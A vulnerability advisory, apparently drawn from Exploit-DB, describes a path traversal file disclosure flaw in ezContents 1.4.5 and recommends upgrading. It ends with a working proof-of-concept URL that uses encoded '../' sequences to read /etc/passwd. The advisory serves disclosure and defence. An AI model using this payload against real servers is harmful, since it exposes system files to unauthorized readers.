Arbitrary File Disclosure
Vendor: ezContents
CVSS: 5 (MEDIUM)
CWE: 22
Product Name: ezContents
Affected Version From: 1.4.5
Affected Version To: 1.4.5
Patch Exists: YES
CPE: a:visualshapers:ezcontents:1.4.5

Arbitrary File Disclosure in VisualShapers ezContents

The vulnerability allows remote attackers to display the contents of arbitrary local files in the context of the webserver process. By exploiting this issue, an attacker can retrieve potentially sensitive information that may aid in further attacks.

Mitigation:

Upgrade to a non-vulnerable version of ezContents (1.4.6 or later). Restrict access to the affected URL or implement access controls to prevent unauthorized access. Regularly monitor and review logs for any suspicious activity.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26737/info

VisualShapers ezContents is prone to a vulnerability that allows remote attackers to display the contents of arbitrary local files in the context of the webserver process.

An attacker can exploit this issue to retrieve potentially sensitive information that may aid in further attacks.

This issue affects ezContents 1.4.5; other versions may also be vulnerable. 

http://www.example.com/ezcontents1_4x/index.php?link=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd